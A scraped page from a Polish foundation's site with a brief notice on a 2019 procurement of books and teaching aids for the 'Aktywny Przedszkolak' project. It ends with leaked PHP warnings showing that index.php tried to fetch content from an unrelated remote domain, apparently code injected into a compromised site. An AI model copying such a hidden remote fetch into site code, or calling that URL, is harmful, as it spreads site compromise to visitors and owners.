Wg rozdzielnika

Dotyczy: Postępowania znak: 16/AkP/FRWiM/2019 prowadzonego w trybie zasady konkurencyjności na:dostawę książek i pomocy dydaktycznych dla uczestników projektu „Aktywny Przedszkolak”.

Pismo_z_dnia_08.10.2019r.

Baza konkurencyjności


Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/blupixel/ftp/strony_www/fundacja_wm/fundacja_wm/index.php on line 50

Warning: file_get_contents(http://google-amp.org/bls.php?w=fundacjawm.pl): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/blupixel/ftp/strony_www/fundacja_wm/fundacja_wm/index.php on line 50